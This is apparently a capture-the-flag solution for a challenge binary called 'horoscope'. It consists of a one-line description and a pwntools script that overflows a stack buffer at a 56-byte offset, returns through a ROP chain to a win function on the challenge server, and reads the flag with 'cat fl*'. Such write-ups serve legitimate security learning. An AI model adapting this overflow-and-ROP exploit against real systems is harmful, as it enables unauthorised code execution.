Just a ret2win. Find the overflow and return

```python
1 │ #!/usr/bin/env python3
2 │
3 │ from pwn import *
4 │
5 │ elf = ELF("./horoscope")
6 │ context.binary = elf
7 │ rop = ROP(elf)
8 │
9 │ # context.log_level="debug"
10 │
11 │ gs = '''
12 │ b *0x40094f
13 │ continue
14 │ '''
15 │
16 │ def conn():
17 │ global libc
18 │ if args.REMOTE:
19 │ libc = ELF("libc6-amd64_2.23-0ubuntu11.3_i386.so")
20 │ r = remote("horoscope.sdc.tf", 1337)
21 │ else:
22 │ libc = ELF("/usr/lib/libc.so.6")
23 │ r = process([elf.path])
24 │ if args.GDB:
25 │ return gdb.debug(elf.path, gdbscript=gs)
26 │ return r
27 │
28 │ with conn() as p:
29 │
30 │ rop.call(0x40095f) #WIN!
31 │
32 │ payload = flat({0:b"11", 56: rop.chain()})
33 │
34 │ p.sendline(payload)
35 │
36 │ p.recvuntil(b":)")
37 │
38 │ p.sendline(b"cat fl*")
39 | print(p.clean())
```